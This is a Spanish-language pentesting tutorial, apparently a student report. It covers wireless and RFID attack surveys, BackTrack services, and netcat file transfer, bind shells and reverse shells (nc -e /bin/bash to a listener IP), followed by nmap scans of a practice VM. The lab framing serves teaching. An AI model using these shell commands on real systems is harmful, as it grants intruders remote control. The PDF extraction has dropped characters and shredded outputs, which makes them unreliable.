Phone Book Dumper: crea una copia de seguridad del Nokia 6310 va Bluetooth.
Tambin funciona en algunos mviles Ericsson. Los datos se escriben en formato XML estndar.
No es necesario introducir ningn dato del objetivo ni emparejamiento, simplemente utiliza
comandos GSM AT a travs de conexiones RFCOMM (Logical Link Control and Adaptation
Protocol o en espaol: Protocolo de control y adaptacin del enlace lgico).
FreeJack: la principal aplicacin de este programa es el enviar mensajes annimos a dispositivos
con Bluetooth activado dentro de su rango
Como vemos, es un campo bastante estudiado (y por lo tanto, tambin por parte de hackers
malintencionados), por lo que siempre es aconsejable mantener los telfonos mviles actualizados,
y no activar Bluetooth mas que en los momentos que sea necesario.
realizar la operacin de captura de lo que se escribe en un teclado, es una operacin difcil que
pueden hacer unos pocos, por lo que no debemos preocuparnos a nivel de usuario. Ni siquiera a
nivel de empresa (depende de qu empresa), puesto que todos sabemos, que siempre podemos
encerrarnos en un bnker a trabajar (y esto probablemente tampoco fuera 100% seguro), pero hay
que encontrar un equilibrio entre la seguridad y la funcionalidad.
las vulnerabilidades que existen para las redes cableadas tradicionales se aplican tambin a
las inalmbricas.
Puede ganarse acceso no autorizado a la red a travs de conexiones inalmbricas eludiendo las
protecciones del firewall.
La informacin que no sea codificada (o que es pobremente codificada) puede ser interceptada
entre dos dispositivos inalmbricos y leda.
Pueden dirigirse ataques de denegacin de servicio contra conexiones o dispositivos inalmbricos.
Puede suplantarse la identidad de usuarios legtimos en redes internas o externas corporativas.
Datos importantes pueden corromperse durante una sincronizacin incorrecta.
Es posible que pueda violarse la privacidad de los usuarios legtimos y ser capaces de seguir sus
movimientos.
Es posible instalar equipamiento no autorizado (por ejemplo, equipos de visitantes) para ganar
acceso a informacin privada.
Los dispositivos de mano puede ser fcilmente robados y pueden revelar informacin confidencial.
Pueden extraerse datos sin que sea detectado de dispositivos mal configurados.
Los virus, u otros cdigos maliciosos pueden corromper los datos de un dispositivo inalmbrico y
despus, introducirse en una red cableada.
Los virus u otros cdigos maliciosos pueden a travs de conexiones inalmbricas conectar con
otras compaas u organizaciones, siendo estas ltimas el objetivo de su ataque, de forma que sea
ms difcil de detectarse.
Los intrusos pueden ganar conectividad a la red desde fuera o dentro del edificio donde est la red,
o ganar, incluso, control de administracin de las redes y sabotear las conexiones.
Puede realizarse ataques internos va transmisiones ad-hoc.
de la red de ordenadores. Sin embargo... que precio tiene el poder escuchar conversaciones
telefnicas de los competidores, por ejemplo? Concretamente, se ha conseguido hacer con 23:
El sistema DECT (patentado en Espaa en 1993 para ser utilizado en Europa) es utilizado para
comunicaciones sin cables de voz y datos de forma segura en distancias cortas. Algunas de sus
aplicaciones son la comunicacin de telfonos inalmbricos con sus estaciones base, aunque existen
ms, como la apertura de puertas de garaje entre otras.
Siendo el protocolo pblicos, hay dos aspectos que no lo son y solo los fabricantes tienen acceso a
los mismos: El algoritmo de autenticacin DASS y el sistema de cifrado DSC.
El algoritmo DASS ha sido descifrado mediante ingeniera inversa, y como muchos telfonos
DECT no llevan habilitada la codificacin DSC, es posible capturar el audio o suplantar la estacin
base donde se conecta el telfono.
Ahora deDECTed.org ha anunciado que en los prximos das publicar una implementacin en C de
la codificacin DSC, que ha sido posible desarrollar gracias a la ingeniera inversa de hardware.
En el Chaos Communication Congress, demostraron como volcar a disco una conversacin
telefnica, utilizando para ello la tarjeta PCMCIA COM-ON-AIR, para la que han desarrollado
drivers para Linux y que se puede conseguir por alrededor de 23 .
Actualmente se cree que hay 30 millones de telfonos que utilizan DECT en Alemania, por lo que
estaramos ante un grave problema de privacidad.
Figura 17:
El dispositivo de la Figura 17: concretamente ofrece:
Escanear
Alcanza
Utilizada
9. Testeo de RFID
RFID (siglas de Radio Frequency Identification o identificacin por radiofrecuencia) es un sistema
de almacenamiento y recuperacin de datos remoto que usa dispositivos denominados etiquetas,
Pgina 60
Figura 18:
El propsito fundamental de la tecnologa RFID es transmitir la identidad de un objeto (similar a un
nmero de serie nico, algo parecido a las direcciones MAC de las tarjetas de red) mediante ondas
de radio.
Esta tecnologa ofrece una cantidad de ventajas, ya es una forma rpida y eficiente de realizar
inventarios. Es posible detectar muchos de stos simultneamente, y si marcamos (por ejemplo los
productos de una tienda), podemos saber cuantas existencias tenemos de un determinado objeto.
Adems, tambin es posible detectarlos por si van a salir o entrar de un recinto, lo cual podra ser
til para detectar hurtos en tiendas.
Pero no solo eso. Los chips RFID estn en todas partes, muchas empresas y laboratorios los usan
como llaves de acceso, algunos coches los utilizan en vez de llaves, y como bien hemos dicho,
tiendas y supermercados para realizar inventarios y sistemas antirrobo. Ahora, se est estudiando
incluso el uso de los mismos para pasaportes, DNI, tarjetas de crdito, o a modo de poder introducir
el historial clnico en los mismos pacientes (tal y como se viene haciendo para perros y gatos por
parte de los veterinarios).
La tecnologa RFID data de antes de la segunda guerra mundial, cuando los Britnicos colocaban
transpondedores de radio en los aviones Aliados para ayudar a los sistemas de radar a distinguir
entre amigos y enemigos. Los primeros chips fueron desarrollados en los laboratorios en los
sesenta, y en la siguiente dcada, el gobierno de los EEUU los utiliz para autorizar a los camiones
que entraban en Los Alamos National Laboratory y otras instalaciones de seguridad.
Los chips comerciales se generalizaron en los ochenta, y los RFID se utilizaban para marcar
propiedades difciles de manejar tales como animales de granja(Figura 19: ) y coches de carretera.
Pero, ha sido en estos ltimos aos, cuando el mercado de los RFID se han expandido, dirigidos por
avances de las bases de datos informticas y las bajadas de los precios de los chips. Ahora, docenas
de compaas, como Motorola, Philips o Texas Instruments las fabrican en cantidades industriales.
Figura 19:
Las etiquetas RFID se basan en la emisin de unos pocos bits de informacin a lectores electrnicos
especializados. La mayora de los chips RFID comerciales son emisores pasivos, lo cual significa
que no llevan alimentacin (como batera o pilas): envan una seal solamente cuando las ondas
recibidas los alimentan con un chorro de electrones. Una vez alimentados, emiten su seal
indiscriminadamente dentro de un cierto rango, normalmente de entre unos pocos centmetros a un
par de metros. Los emisores activos, con alimentacin interna, pueden enviar seales a cientos de
Pgina 61
metros; estos son utilizados en, por ejemplo, algunos pagos de peaje automatizados de EEUU.
Como medida de seguridad, las seales RFID pueden ser cifrados. Estos chips, que probablemente
acaben siendo implantados en documentos de identidad, por ejemplo, son los candidatos ideales
para ser codificados, y haciendo que sea ms difcil para los lectores no autorizados recavar
informacin. Pero los RFID comerciales (refirindonos por comerciales a los de los
supermercados), no incluyen cifrados, ya que suele ser bastante caro: un chip RFID cifrado cuesta
alrededor de 5$, lo cual no lo hace rentable muchas veces.
Esto hace, que la mayora de los RFID sean vulnerables a su clonacin, o si el chip tiene reas de
memoria que permitan escritura, el insertarle datos. Siendo as, se permitira el cambiar precios, por
ejemplo, una opcin muy atractiva para delincuentes.
Cambiar semforos a verde. Algunos semforos son manejados por infrarrojos, por lo que es
posible manejarlos. Existen manuales por la red para construir dispositivos que realicen esto. Basta
con teclear en cualquier buscador MIRT, e incluso lo venden en algunas web.
Algunas puertas de garaje antiguas solan funcionar por infrarrojos, pero hoy en da la gran mayora
funcionan por radiofrecuencia.
Por lo que vemos, que las implicaciones no son demasiadas debido al avance de las tecnologas (ya
que las tecnologas inalmbricas favoritas son radiofrecuencia), pero debemos realizar algunas
comprobaciones mnimas para poder evitar algn susto.
1. Revisin de Permetro
En este mdulo se revisan todas las medidas de seguridad que existen para proteger los lmites de la
organizacin y sus activos. Se revisan medidas de proteccin tales como vallas, luces, muros etc...
2. Revisin de Monitorizacin
En este mdulo se revisan dispositivos de monitorizacin de los puntos de acceso. Mas que la
revisin de los propios dispositivos, se busca el comprobar que lugares estn monitorizados, si los
dispositivos estn correctamente situados. Es decir, si hay lugares sin vigilar, otros demasiado
vigilados etc...
5. Revisin de Localizacin
ste es un mtodo de ganar acceso a una organizacin a travs de las debilidades de su localizacin
y proteccin de elementos externos. Por ejemplo, comprobar lneas de visin que existen hasta la
Pgina 63
organizacin, posibles lugares desde los que es posible escuchar dentro de la organizacin (por
ejemplo escuchas lser), horas de luz solar, clima etc... Es decir, se trata de revisar condiciones
externas a la propia organizacin, y que pudieran afectar a su seguridad segn donde se encuentra la
empresa.
Pgina 64
Pgina 65
Introduccin
La finalidad de esta parte tcnica del documento, es tratar de ver, y estudiar, un conjunto de
herramientas software de uso en las auditoras de seguridad informtica.
Se presentarn, divididos en dos partes, distintos puntos de vista para poder aplicar las herramientas
que se van a estudiar, enfocado hacia el aprendizaje de las mismas por parte del lector. As mismo,
se presentan tambin junto con los problemas y observaciones encontradas durante el estudio del
autor.
Como primera parte, se estudiar la Backtrack, junto con algunas herramientas que contiene. Ser
una primera parte de aprendizaje de herramientas, siguiendo un orden lgico para comprender su
aprendizaje, aunque sin una relacin causal entre ellas.
La segunda parte, ser introducir un caso prctico en el que poder utilizar herramientas de seguridad
con un objetivo en mente: obtener el control del sistema. Por lo tanto, se irn presentando las
herramientas en un orden causal (siguiendo las necesidades que vayan apareciendo para cumplir el
objetivo), e introduciendo valoraciones y aportaciones personales del autor.
A continuacin, se presenta ya la primera parte: La distribucin Backtrack.
programa que contena la red emulada con la que se va a realizar las pruebas, est en el formato .iso,
y nos falta un entorno de ejecucin, es decir, la mquina virtual VMWare. VMWare Player no nos
permite la creacin de mquinas virtuales, por lo que se estuvo estudiando la posibilidad de buscar
entre tcnicos de laboratorio de la facultad de informtica, o algn conocido que pudiera crear la
mquina virtual para asociarle la iso (de forma legal). Finalmente se encontr una solucin, que
describo a continuacin:
En los archivos .vmx de las mquinas virtuales para VMWare, viene especificado en texto plano, la
configuracin de la mquina virtual. El siguiente extracto, es parte de una mquina virtual
cualquiera, en el que se ha modificado la lnea donde viene especificada la iso que he modificado a
mano para poder utilizar la iso descargada:
.encoding = "UTF-8"
# VM Machine Info
guestOS = "linux"
displayName = "Linux"
config.version = "7"
memsize = "128"
# CDROM Info
ide1:0.present = "TRUE"
ide1:0.fileName = "Lab_Virtual_Labs.DragonJAR.iso"
ide1:0.deviceType = "cdrom-image"
Al ejecutar VMWare Player, elegimos cargar una mquina virtual existente, seleccionando el .vmx
que acabbamos de modificar, cargndose perfectamente.
Tras esto, solo nos queda descargarnos una mquina virtual de la web oficial de Backtrack 3 (http://
www.remote-exploit.org/backtrack.html).
Una vez descargada, solamente queda el cargar la mquina virtual con VMWare, que funcion sin
problemas.
Por ltimo, se ha cambiado el tipo la configuracin de red de las mquinas virtuales para que
utilicen NAT, creando as una intranet, para que puedan comunicarse unas con otras, y adems,
puedan comunicarse con el exterior.
as porque vienen a ser servicios que o bien son populares en la red actual, o bien porque ofrecen
bastante utilidad al auditor. Pasamos pues, a describirlas a continuacin:
0 0.0.0.0:22
0.0.0.0:*
hola
Como vemos, funciona correctamente. Es una forma sencilla de poder conectarnos a Backtrack
cuando queramos trabajar desde l, a travs de una shell de la mquina local.
El siguiente servicio a probar, ser un servidor Web, uno de los servicios desde los cuales las
empresas se comunican con el exterior:
Servidor Web
Uno de los servicores webs ms utilizados a lo largo de la red, es el Apache. Es bien conocido, ya
que es libre, y suele ser bastante robusto. Por lo tanto, ser un buen ejemplo para aprender a ponerlo
en marcha, y poder practicar, y un buen ejemplo de servicio bsico de Bactrack.
Para ponerlo en marcha, ejecutamos:
bt ~ # apachectl start
httpd: Could not reliably determine the server's fully qualified
domain name, using 127.0.0.1 for ServerName
bt ~ # netstat -ant|grep 80
tcp
LISTEN
0 192.168.197.129:80
0.0.0.0:*
Aqu, vemos como hemos ejecutado el apache y la respuesta que obtenemos. Parece que nos
devuelve un error, pero es normal obtenerlo. Como no tenemos configurado un dominio para el
Apache, ste no es capaz de encontrarlo, y dice que estar en 127.0.0.1 (la loop ip). Para comprobar
que el servicio est en marcha, entramos en nuestro navegador web favorito, introducimos la ip de
la mquina virtual de la Backtrack, y comprobamos que el servidor web est corriendo (Figura 20:
):
Figura 20:
Tenemos ante nosotros, una pgina web que ofrece Apache por defecto, para que podamos ver que
efectivamente el servicio est en marcha, y funcionando correctamente.
Servidor atftpd
El siguiente servicio a probar, es el atftpd, que es el servidor que incluye backtrack 3 para TFTP
(Trivial File Transfer Protocol). Vamos a ejecutar el daemon, y dejarlo escuchando en el puerto 69:
bt / # atftpd --daemon --port 69 /tmp/
Pgina 69
0 0.0.0.0:69
0.0.0.0:*
Para comprobar que funciona, en la mquina de Bactrack, ponemos un archivo, por ejemplo:
bt tmp # echo hola> hola.txt
Y ahora, desde nuestra mquina local, instalamos el tftp (el cliente) si no lo tenemos. En nuestro
caso, hemos ejecutado:
alberaan@Smaug:~$ sudo apt-get install tftp
Al acabar la instalacin, vamos a intentar bajarnos a la mquina local, el archivo hola.txt:
alberaan@Smaug:~$ tftp
tftp> connect
(to) 192.168.197.129
tftp> get hola.txt
Received 6 bytes in 0.0 seconds
tftp> q
Podremos comprobar entonces, que el archivo lo tenemos en el directorio actual donde hemos
ejecutado el cliente tftp.
Servidor VNC
El ltimo servicio bsico que vamos a probar, es el vncserver. VNC (virtual network computing) es
un sistema de escritorio remoto, el cual puede ser muy til en caso de querer realizar tests de
penetracin. Ejecutaremos el vncserver en la backtrack:
bt ~ # vncserver
You will require a password to access your desktops.
Password: acceder
Verify:
acceder
trataremos de acceder al escritorio remoto. Primero, vamos a comprobar que el servicio est
corriendo, y de paso, averiguamos el puerto concreto (puede variar de una versin a otra) , y
podemos hacer el netstat como hemos venido haciendo hasta ahora:
bt / # netstat -anu | grep 590
udp
0 0.0.0.0:5902
0.0.0.0:*
LISTEN
Bien, ahora sabemos, que el puerto 5902 est escuchando el servidor vnc. Para comprobarlo, vamos
a usar el navegador web (en mi caso Firefox), y comprobar que funciona. Se cargar el siguiente
applet(Figura 21: ):
Figura 21:
Introducimos ah la contrasea que hemos puesto al arrancar el vncserver, y nos encontramos con el
escritorio de nuestra backtrack(Figura 22: ):
Figura 22:
El servicio no funciona demasiado bien a travs del cliente web, pero es una forma muy cmoda de
poder ver lo que hay al otro lado de la conexin, y poder manejarlo a golpe de click. Servicios
similares se vienen utilizando desde hace mucho tiempo por hackers para poder divertirse con la
vctima, ya que ofrece un control muy vistoso.
Una vez vistos todos los servicios bsicos, es hora de avanzar hacia la siguiente seccin, y estudiar
la herramienta Netcat.
Backtrack Netcat
Netcat es una herramienta multiplataforma que lee y escribe datos a travs de conexiones de red.
Pgina 71
Era utilizado como una herramienta utilizada por administradores y programadores para depurar
apliaciones de red, con la curiosidad de que no se haba descubierto todos los comandos que
mermita. Por estos motivos, tuvo un gran auge entre la comunidad Hacker, y a menudo era referida
como la navaja multiusos del hacker. Entre otras cosas (que veremos ms adelante), permite
comprobar disponibilidad de puertos, qu aplicaciones corren y escuchan este puerto, conectarnos a
un servicio de red de forma manual (como haramos con Telnet). Fue usado, sobre todo por su
capacidad de abrir puertas traseras.
Una vez nos hemos documentado un poco sobre qu es, y un poco de su historia, nos sentamos
delante de nuestra Backtrack (que trae Netcat por defecto). Lo que se ha hecho, ha sido abrir de
nuevo el servidor ssh y el servidor Apache, para poder realizar las pruebas desde la mquina local
hacia la Backtrak, y aprender a conectarnos usando Netcat. Una vez nos hemos conectado a la
Backtrack por ssh tecleamos:
bt ~ # nc -h
[v1.10]
connect to somewhere:
options:
-e prog
[dangerous!!]
-b
allow broadcasts
-g gateway
-G num
source-routing pointer: 4, 8,
-h
this cruft
8
12, ...
-i secs
ports scanned
-l
-n
-o file
-p port
-r
-q secs
-s addr
-t
-u
UDP mode
-v
-w secs
-z
Aqu vemos las distintas opciones que nos ofrece Netcat. Una opcin interesante, es -vv para
poder obtener la mayor informacin posible. Tecleamos para ver que aplicacin hay escuchando en
el puerto 22 en nuestra propia mquina:
bt ~ # nc -vv 192.168.197.129 22
192.168.197.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.197.129] 22 (ssh) open
SSH-1.99-OpenSSH_5.0
sent 0, rcvd 21
Efectivamente, hay un servidor ssh escuchando ese puerto. Concretamente, OpenSSH 5.0. Ahora,
vamos ver el puerto 80:
bt ~ # nc -vv 192.168.197.129 80
192.168.197.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.197.129] 80 (http) open
sent 0, rcvd 0
Como vemos, hay un servidor de http abierto.
Ya comprendemos el uso bsico de Netcat, y ahora, sera conveniente aprender como utilizarlo para
realizar tests de intrusin.
Pgina 74
Figura 23:
La utilidad de esto en un principio podra parecer nula (mas all de sus aplicaciones de ocio), pero
como veremos ms adelante, el mundo de posibilidades que nos ofrece, es inmenso, sobre todo
desde el punto de vista de tests de intrusin. Una de nuestars metas a la hora de tratar de penetrar en
un sistema, ser el poder colocar un Netcat en modo listen (o similar)en la mquina objetivo. Es por
ello, vital, aprender a realizar esto.
Envo de archivos
Lo siguiente que vamos a probar, es a enviar archivos mediante Netcat. La utilidad prctica de esto,
es que una vez tengamos acceso al sistema, podamos intercambiar ficheros con l, y poder
continuar con la auditora. Un usuario malintencionado podra subir virus, troyanos etc.., y de igual
forma, nosotros podramos subir software similar para poder continuar con la escalada de
privilegios, o continuar con el test de penetracin en cuestin. Para ello, vamos a dejar netcat a la
escucha en Backtrack, y redirigiremos la salida a un archivo de texto:
bt ~ # nc -lvp 12345 > salida.txt
listening on [any] 12345 ...
Y desde Ubuntu, creamos el archivo de texto a enviar, y nos conectamos como hemos hecho antes,
enviando el contenido del archivo:
alberaan@Smaug:~$ echo Esto es un archivo > test.txt
alberaan@Smaug:~$ nc -vv 192.168.197.129 12345 < test.txt
192.168.197.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.197.129] 12345 (?) open
Finalmente, vemos el contenido del archivo salida.txt que habr quedado en Backtrack:
bt ~ # cat salida.txt
Esto es un archivo
Hemos de resaltar, que esto se podra hacer con cualquier tipo de archivo, ya que se transmite bit a
bit, por lo que podramos transferir no slo texto, sino cualquier tipo de archivo. Hemos realizado
de nuevo lo anterior, solo que redirigiendo un archivo de imagen en lugar de texto, y transferido con
el mismo mtodo. Desde Backtrack:
Pgina 75
Finalmente, desde Backtrack podemos abrir la imagen con cualquier visor de imgenes, y
comprobar, que efectivamente, el archivo se ha transferido correctamente.
Esta ltima parte, result ser sorprendente: como es posible que, con un programa con el que antes
habamos enviado texto, podamos ahora enviar una imagen?
Ahora que ya conocemos como comunicarnos con la mquina vctima, es un paso lgico el
aprender como controlarla con una shell.
Administracin remota
Vamos a ejecutar desde Ubuntu el Netcat para que abra una shell en la mquina remota, y poder
ejecutar comandos. Esta es una de las metas de cualquier hacker, para tener control sobre la
mquina/as objetivo. El asaltarla, y el poder procurarse de una interfaz para poder interactuar con la
mquina, y dejarse una puerta trasera para poder acceder posteriormente de una forma ms fcil y
rpida. Netcat ofrece una forma de hacerlo, ya que permite el que se ejecute un programa en cuanto
algo se conecte a l. Lo primero que podemos pensar, es en una shell: bash. Dicho esto, vamos a
proceder a obtener control desde Ubuntu sobre Backtrack:
Desde backtrack dejaremos netcat a la escucha del puerto 12345, tal y como hemos hecho antes.
Ahora usaremos un nuevo parmetro: -e seguido del ejecutable que queremos que se ejecute al
conectarse a l un cliente. Hay que aadir, que no ejecutar el programa si no ponemos la ruta
completa o la relativa. Como queremos obtener una shell, ponemos la shell de linux que est en
/bin/bash. En nuestro caso nos hemos movido a ese directorio y ejecutado la orden desde all. En
caso de querer obtener una shell en windows, lo que haramos sera poner cmd.exe, que es la shell
que ofrece esta gama de sistemas operativos. A continuacin la orden en backtrack:
bt bin # nc -lvp 12345 -e bash
listening on [any] 12345 ...
192.168.197.1: inverse host lookup failed: Unknown host
connect to [192.168.197.129] from (UNKNOWN) [192.168.197.1] 44119
Hemos puesto Netcat a la escucha, y decidmos que queremos que ejecute bash.
Ahora nos conectamos desde la shell de Ubuntu, tal y como venimos haciendo hasta ahora. Esto
har que se ejecute el bash en la mquina cliente, y podremos empezar a trabajar como si fuera una
shell local (aunque algunas cosas cambiarn, por ejemplo, no se mantienen los alias):
alberaan@Smaug:~$ nc -v 192.168.197.129 12345
192.168.197.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.197.129] 12345 (?) open
Pgina 76
Aqu (aunque no aparezca el promt), podemos ejecutar rdenes igual que si fuera nuestra propia
shell: hemos conseguido entrar en el sistema (con los permisos que tenga el usuario que haya
ejecutado el Netcat en la mquina vctima).
Shell inversa
Muchas veces, sucede que no tenemos control sobre el cmo acceder a la mquina vctima. Ya sea
porque la mquina vctima tiene una IP dinmica, no es visible desde otras redes porque est tras un
router con NAT. Tambin puede ser porque el firewall filtre las conexiones entrantes etc... Una
buena idea para solventar esto, es usar Netcat para crear una shell inversa.
Una shell remota normal, abre un puerto y espera recibir conexiones entrantes desde un cliente (el
modo de proceder est descrito en el paso anterior). Esto no se podra hacer en alguno de los casos
descritos en el prrafo anterior.
Una shell inversa, se suele utilizar cuando se da un caso de los mencionados arriba. Es el cliente el
que se conecta a un puerto abierto de la mquina atacante. De esta forma, el atacante puede
controlar que no se den las condiciones mencionadas en su propia red/mquina.
Vista la importancia de esta opcin en netcat, pasamos a probarlo en nuestras terminales:
Para este ejemplo, vamos a usar la mquina local (Ubuntu) como atacante, y la Backtrack como
vctima.
Desde Ubuntu, dejamos netcat a la escucha, de la misma forma que venimos haciendo hasta ahora:
alberaan@Smaug:~$ nc -lvp 12345
listening on [any] 12345 ...
Y desde Backtrack, le decimos a que IP conectarnos, y que ejecute /bin/bash en cuanto se realice la
conexin:
bt ~ # nc -v 192.168.197.1 12345 -e /bin/bash
192.168.197.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.197.1] 12345 (?) open
Ahora, desde nuestra mquina ubuntu, podemos ejecutar un ls, para comprobar que efectivamente,
tenemos una shell abierta en Backtrack. Como nota adicional, podemos ver, que el atacante se
conecta como si fuera el usuario que ejecuta el netcat en la mquina vctima. Desde ubuntu
ejecutamos el comando whoami (para saber que usuario somos), y obtenemos como respuesta:
whoami
root
Con esto, finalizamos la primera parte del trabajo. Ya conocemos algunas herramientas y servicios
bsicos que tenemos a nuestra disposicin y pasamos a la segunda parte.
Test de penetracin
La finalidad de esta segunda parte, ser el mostrar el aprendizaje de herramientas y tcnicas para
poder realizar un Test de Penetracin haciendo uso de la distribucin BackTrack. Es decir,
aplicaremos los conocimientos aprendidos en el primer taller a un ejemplo real (emulado), y nos
adentraremos en los test de intrusin en un sistema que no importar que se dae, y legal para
realizarlo, y por lo tanto, un entorno de prcticas ideal.
Como segundo objetivo, ser el obtener la contrasea de root del sistema atacado.
Pgina 77
Introduccin
Conociendo ya algunas herramientas de seguridad, y tras haber estudiado la auditora OSSTMM,
tenemos el conocimiento suficiente como para poder realizar un pequeo test de intrusin, y
adentrarnos en un caso concreto. Este escenario, es una .iso que fue creada con la finalidad de ser
utilizada como entorno de pruebas de seguridad informtica. Su descripcin es la siguiente:
El escenario sobre el cual vamos a trabajar, emula el CEO (Chief
Executive Officer o director ejecutivo) de una pequea empresa que
ha sido presionado por el Comit Administrativo para ser objeto de
un Test de Penetracin a realizarse desde la empresa. El Director
General afirma que su empresa es segura, cree adems de que este
Test de Penetracin ser un enorme desperdicio de dinero, sobre
todo porque ya tiene una solucin de exploracin (escaneo) de
vulnerabilidades (Nessus). Para hacer felices a los del Comit
Administrativo, l decide contratarle a usted y le d un plazo de
5 das para realizar el trabajo, pues como se mencion l no cree
que la empresa sea vulnerable a cualquier intento de acceso no
autorizado.
Su tarea es analizar solo un servidor en el cual se aloja una
pgina Web que ofrece informacin de contacto de la misma.
El Director General espera que usted intente con todos los tipos
de ataques que estn a su disposicin, pues est seguro de que
usted no podr vulnerar el sistema y obtener acceso.
Demostrar que el sistema es vulnerable sera la mejor manera de
concienciar al Director General, para desde all implementar
mejores prcticas en materia de seguridad Informtica.
NMAP
Introduccin
Pgina 78
Host discovery
Lo primero que hacemos, es hacer un host discovery. Como ya hemos dicho, lo primero que
debemos hacer al entrar en un sistema, es ver que hay. Hacer un host discovery se refiere a echar un
vistazo a ver que mquinas existen, y estn funcionando. Nos interesar para que posteriormente
podamos hacer estudios de estas mquinas disponibles sin tener que generar demasiado trabajo a
nuestras herramientas, y se centren solamente en las mquinas disponibles.
Para ello, vamos a hacer un ping scan (hace pings a todas las mquinas que especifiquemos en el
rango. Ahora bien, a que rango se lo hacemos? Desde Ubuntu, vamos a ver nuestras interfaces
virtuales, para saber en que red est nuestra red virtualizada. Hacemos ifconfig, y nos aparecen las
siguientes interfaces virtuales:
vmnet1
Link encap:Ethernet direccinHW 00:50:56:c0:00:01
inet direccin:172.16.5.1
Mscara:255.255.255.0
Difusin:172.16.5.255
MTU:1500
Mtrica:1
Link encap:Ethernet
TX bytes:0 (0.0 B)
direccinHW 00:50:56:c0:00:08
inet direccin:192.168.197.1
Mscara:255.255.255.0
Difusin:192.168.197.255
MTU:1500
Mtrica:1
TX bytes:0 (0.0 B)
Bien, tenemos ips de nuestra mquina, pertenecientes a dos redes virtuales. Tambien nos fijamos en
la mscara, y as tenemos 2 redes que investigar: 172.16.5.1/24 y 192.168.197.1/24. El /24 la
obtenemos de la mscara de subred (255.255.255.0). Bien, hagamos el ping scan, con el comando:
namp -n -sP 192.168.197.0/24
Como respuesta, obtenemos:
Starting Nmap 4.53 ( http://insecure.org ) at 2009-04-03 13:39
CEST
Host 192.168.197.1 appears to be up.
Pgina 79
Vamos a intentar escanear puertos, a ver si encontrsemos alguno abierto o filtrado. Algo que nos
indique que hay una mquina corriendo, y que aplicaciones o servicios estn corriendo. Encontrar
incluso las versiones de los programas que estn escuchando a los servicios. Para ello, hacemos un
escaneo de puertos cualquiera (por ejemplo el stealth -sS), y reducimos el rango de puertos a los
tpicos, reduciendo as el tiempo que durar el test:
sudo nmap -PN -sS -p80,22 192.168.197.0/24
Starting Nmap 4.53 ( http://insecure.org ) at 2009-04-03 14:23
CEST
Interesting ports on 192.168.197.1:
PORT
STATE
SERVICE
STATE
SERVICE
Hemos intentado acceder a la pgina web donde se muestran las instrucciones para la realizacin
del test de intrusin (una introduccin hacia la distribucin live preparada para prcticas de test de
penetracin). Habamos visto, que la ip objetivo, era 192.168.197.254. Pero esta ip no nos sirve
pginas web (El firefox no nos sirve la pgina). Investigando, nos damos cuenta de que las ips
acabadas en 254 suelen corresponder a routers. En nuestro caso, debe de ser algn router virtual
creado por VMWARE. Por lo tanto, estamos en las mismas. Investigando sobre esta distribucin,
nos damos cuenta de que la web que sirve la pgina es 192.168.1.100. Pero sta sigue sin responder.
Intentamos buscarla haciendo escaneos de puertos y de ips a lo largo de nuestras redes, pero no hay
manera de encontrarla, y no somos capaces de acceder.
Finalmente, tras un trabajo de investigacin y pruebas, decidimos cambiar la ip de nuestra backtrack
a la subred 192.168.1.0/24, haciendo que pertenezca a la red de la distribucin:
Pgina 80
Link encap:Ethernet
HWaddr 00:0C:29:19:FD:5D
inet addr:192.168.1.4
Mask:255.255.255.0
Bcast:192.168.1.255
MTU:1500
Metric:1
RX packets:111 errors:0 dropped:0 overruns:0 frame:0
TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:132902 (129.7 KiB)
Mask:255.0.0.0
UP LOOPBACK RUNNING
MTU:16436
Metric:1
TX bytes:0 (0.0 b)
Figura 24:
Pgina 81
Mquinas online
Vamos a probar de nuevo a hacer un barrido a ver cuantas mquinas encontramos conectadas en la
red 192.168.1.0/24 (el Host descovery descrito antes). Para ello, podemos hacerlo de 2 formas, y as
aprendemos las dos:
bt ~ # nmap -sP 192.168.1.1-254
Starting Nmap 4.60 ( http://nmap.org ) at 2009-04-08 13:11 CEST
Host 192.168.1.4 appears to be up.
Host 192.168.1.100 appears to be up.
MAC Address: 00:0C:29:A2:DA:9C (VMware)
Nmap done: 254 IP addresses (2 hosts up) scanned in 31.732 seconds
bt ~ # nmap -sP 192.168.1.0/24
Starting Nmap 4.60 ( http://nmap.org ) at 2009-04-08 13:14 CEST
Host 192.168.1.4 appears to be up.
Host 192.168.1.100 appears to be up.
MAC Address: 00:0C:29:A2:DA:9C (VMware)
Nmap done: 256 IP addresses (2 hosts up) scanned in 30.087 seconds
En ambas, hemos puesto la opcin -sP (ping scan), y en la primera, hemos puesto un rango de ips.
En la segunda, hemos hecho lo mismo, solo que hemos especificado una mscara de red, en lugar
de un rango. En ambas obtenemos la misma respuesta: en la red, est nuestro equipo, y el servidor
web que hemos visitado antes.
Apuntaremos los datos de la mquina que nos interesa:
Host 192.168.1.100 appears to be up.
MAC Address: 00:0C:29:A2:DA:9C (Vmware)
Ahora vamos a realizar un escaneo ms intenso sobre la mquina objetivo, probando, adems, los
puertos TCP comunes. Estaremos haciendo lo mismo que en la seccin donde se describe el escaneo
de puertos, es decir, comprobando los puertos que estn a la escucha, y que aplicaciones estn
escuchando:
bt ~ # nmap -PE -v -p1-65535 -PA21,23,80,3389 -A -T4 192.168.1.100
Este tipo de escaneo, es bastante comn, y algunas herramientas grficas (por ejemplo Zenmap) que
implementan NMAP, lo traen por defecto. Vamos a explicar un poco las opciones:
-PE: NMAP puede enviar paquetes de ICMP tipo 8 (echo request) a la ip objetivo, y esperar la
respuesta de tipo 0 (echo request), de aquellos hosts que estn disponibles. Muchas veces este tipo
de pings estn filtrados por muchos administradores, por lo que muchas veces se suelen hacer otros
Pgina 82
host)
Initiating OS detection (try #1) against 192.168.1.100
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 13:28
Completed SCRIPT ENGINE at 13:28, 0.05s elapsed
Host 192.168.1.100 appears to be up ... good.
Interesting ports on 192.168.1.100:
Not shown: 65527 filtered ports
PORT
STATE
SERVICE
20/tcp
closed ftp-data
VERSION
21/tcp open
IPv4 socket)
ftp
22/tcp
ssh
open
open
smtp
Sendmail 8.13.7/8.13.7
ENHANCEDSTATUSCODES
PIPELINING
8BITMIME
SIZE
DSN
ETRN
DELIVERBY
250 HELP
2.0.0 Topics:
2.0.0
HELO
EHLO
RCPT
DATA
2.0.0
